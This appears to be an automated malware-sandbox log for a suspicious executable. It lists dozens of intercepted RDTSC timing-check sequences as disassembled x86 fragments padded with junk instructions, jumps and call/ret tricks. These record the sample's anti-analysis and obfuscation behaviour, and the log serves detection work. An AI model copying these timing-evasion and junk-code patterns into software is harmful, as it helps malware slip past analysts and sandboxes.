Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1592A second address: F1598E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD673h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA030CAD677h 0x0000000f nop 0x00000010 jmp 00007FA030CAD66Dh 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D3B94h] 0x0000001d push 00000000h 0x0000001f sub di, DBC8h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FA030CAD673h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1598E second address: F15994 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F15994 second address: F159B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA030CAD678h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F16302 second address: F16307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1829E second address: F182C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d jmp 00007FA030CAD66Ah 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F17FBD second address: F17FC2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F18D5A second address: F18D5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F18D5E second address: F18D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F18D64 second address: F18D75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA030CAD66Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F18AD6 second address: F18ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F18D75 second address: F18E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FA030CAD677h 0x0000000d nop 0x0000000e mov esi, 01DA8FE9h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007FA030CAD668h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f sub edi, dword ptr [ebp+122D3BCCh] 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007FA030CAD668h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 0000001Bh 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 mov edi, ebx 0x00000053 jmp 00007FA030CAD677h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push esi 0x0000005c jnc 00007FA030CAD666h 0x00000062 pop esi 0x00000063 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F18E09 second address: F18E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1DC4F second address: F1DC6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030CAD675h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1DC6D second address: F1DC71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F20139 second address: F20148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F1F32B second address: F1F3A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030F107B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FA030F107B8h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 cmc 0x00000017 mov ebx, dword ptr [ebp+122D1B7Fh] 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 mov eax, dword ptr [ebp+122D0169h] 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007FA030F107A8h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 0000001Ah 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 mov di, ax 0x00000047 push FFFFFFFFh 0x00000049 add dword ptr [ebp+122D367Fh], esi 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F22059 second address: F22076 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD671h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007FA030CAD66Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F22076 second address: F220D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov ebx, 4120F157h 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FA030F107A8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007FA030F107A8h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 00000018h 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 add edi, 7D1D10BAh 0x00000049 add ebx, 7DDCC029h 0x0000004f xchg eax, esi 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F220D7 second address: F220DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F220DD second address: F220E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F23119 second address: F2311E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F23392 second address: F23396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F2431E second address: F24322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F23396 second address: F2339A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F251C2 second address: F251E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030CAD678h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F24322 second address: F24328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F24328 second address: F243E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jc 00007FA030CAD666h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f call 00007FA030CAD677h 0x00000014 jmp 00007FA030CAD66Fh 0x00000019 pop ebx 0x0000001a push dword ptr fs:[00000000h] 0x00000021 jmp 00007FA030CAD676h 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007FA030CAD668h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 mov ebx, 7F6873FFh 0x0000004c mov eax, dword ptr [ebp+122D0BADh] 0x00000052 push 00000000h 0x00000054 push ebp 0x00000055 call 00007FA030CAD668h 0x0000005a pop ebp 0x0000005b mov dword ptr [esp+04h], ebp 0x0000005f add dword ptr [esp+04h], 00000017h 0x00000067 inc ebp 0x00000068 push ebp 0x00000069 ret 0x0000006a pop ebp 0x0000006b ret 0x0000006c mov bl, ch 0x0000006e push FFFFFFFFh 0x00000070 and ebx, 2227B4C4h 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b jno 00007FA030CAD666h 0x00000081 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F243E6 second address: F243EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F243EA second address: F243F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F25353 second address: F25359 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F25359 second address: F2536C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA030CAD66Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F271E9 second address: F271EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F271EF second address: F27258 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD677h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FA030CAD668h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 mov ebx, dword ptr [ebp+122D3A94h] 0x0000002e push 00000000h 0x00000030 adc bl, FFFFFF94h 0x00000033 xchg eax, esi 0x00000034 push esi 0x00000035 pushad 0x00000036 jmp 00007FA030CAD676h 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F27258 second address: F27269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FA030F107ACh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F27269 second address: F2726D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F28373 second address: F2838D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA030F107B2h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F2838D second address: F28418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FA030CAD668h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov bh, 34h 0x00000027 push 00000000h 0x00000029 mov edi, dword ptr [ebp+1244CB9Ah] 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007FA030CAD668h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b pushad 0x0000004c call 00007FA030CAD675h 0x00000051 mov dword ptr [ebp+1245E305h], edx 0x00000057 pop eax 0x00000058 popad 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FA030CAD679h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F28418 second address: F2842C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA030F107B0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F29370 second address: F29375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F29375 second address: F293E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D327Dh], edx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007FA030F107A8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov dword ptr [ebp+1245E512h], ebx 0x00000035 push 00000000h 0x00000037 js 00007FA030F107B0h 0x0000003d pushad 0x0000003e mov eax, dword ptr [ebp+122D3362h] 0x00000044 mov ecx, edx 0x00000046 popad 0x00000047 xchg eax, esi 0x00000048 jno 00007FA030F107B0h 0x0000004e push eax 0x0000004f push ebx 0x00000050 pushad 0x00000051 jmp 00007FA030F107AFh 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F2A2D4 second address: F2A2D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F2B3DC second address: F2B445 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030F107AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub dword ptr [ebp+122D3161h], ebx 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FA030F107A8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007FA030F107A8h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a push eax 0x0000004b push eax 0x0000004c je 00007FA030F107ACh 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F2A4DF second address: F2A4E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F2A4E4 second address: F2A4EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F2A5A2 second address: F2A5A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F2D3D3 second address: F2D3D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F2C501 second address: F2C507 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F2C507 second address: F2C511 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA030F107ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F2D5B8 second address: F2D5BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F2D5BD second address: F2D5E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push edi 0x0000000b jp 00007FA030F107A6h 0x00000011 pop edi 0x00000012 pushad 0x00000013 jmp 00007FA030F107B3h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F18AC1 second address: F18AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F18AC5 second address: F18ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FA030F107ACh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F3D082 second address: F3D0AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD674h 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA030CAD66Fh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F42DFC second address: F42E1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FA030F107AFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F42E1C second address: F42E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F42E20 second address: F42E4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030F107AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FA030F107ABh 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007FA030F107A6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F42E4B second address: F42E4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F42E4F second address: F42E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F42E55 second address: F42E66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA030CAD66Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F42E66 second address: F42E86 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA030F107B1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F4916C second address: F49170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F49170 second address: F49174 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F49174 second address: F49180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F49180 second address: F4919B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030F107B7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F4945A second address: F4947A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA030CAD666h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA030CAD673h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F4947A second address: F49496 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030F107B8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F49620 second address: F49624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F4F29A second address: F4F29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F4F29E second address: F4F2B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD672h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F4F2B4 second address: F4F302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jnc 00007FA030F107B9h 0x0000000e jmp 00007FA030F107B1h 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jmp 00007FA030F107B8h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F4F302 second address: F4F306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F4DD07 second address: F4DD0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F4DD0B second address: F4DD11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F4DE7C second address: F4DE80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F4DE80 second address: F4DEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA030CAD679h 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FA030CAD666h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F4E2EE second address: F4E2F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CLaYpUL3zw.exe	RDTSC instruction interceptor: First address: F4E2F3 second address: F4E30A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA030CAD671h 0x0000000b rdtsc
